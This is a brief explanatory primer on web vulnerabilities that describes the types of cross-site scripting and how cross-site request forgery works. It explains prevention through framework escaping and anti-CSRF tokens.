Cross-site scripting (XSS)
What is XSS
There are couple of types of XSS: reflected, stored, dom-based, and mutation XSS.
First, one is reflected XSS, which simply reflected script tags in the response. The browser identifies these code as a script block and executes them.
Stored XSS is similar to the reflected one but more powerful. Instead reflected in the response, it is stored in the database and gets executed by pulling it out from where it is stored. For example, you can type some script tags(<script></script>) in some dummy website’s comment area. And whoever sees the comment gets infected automatically.
How XSS works
How can we prevent XSS
Popular frameworks like React, Vue, and Angular have helped deal with such problems.
Cross-site request forgery (or CSRF)
What is CSRF and how it works
Cross-site request forgery (or CSRF) allows an attacker to induce a victim user to perform actions that they do not intend to. Let’s say you’ve logged in to an online bank website. And then you are lured to open a malicious web in another tab. This malicious web can forgery a request to the bank’s server to make some dangerous behaviors as cookies are sent automatically on every request you make to that domain regardless of your current domain. As a result, a forgery action happens in the context of your session.
How can we prevent CSRF problems
Anti CSRF token
A CSRF token is a unique, secret, unpredictable value that is generated by the server-side application and transmitted to the client in such a way that it is included in a subsequent HTTP request made by the client. When the later request is made, the server-side application validates that the request includes the expected token and rejects the request if the token is missing or invalid.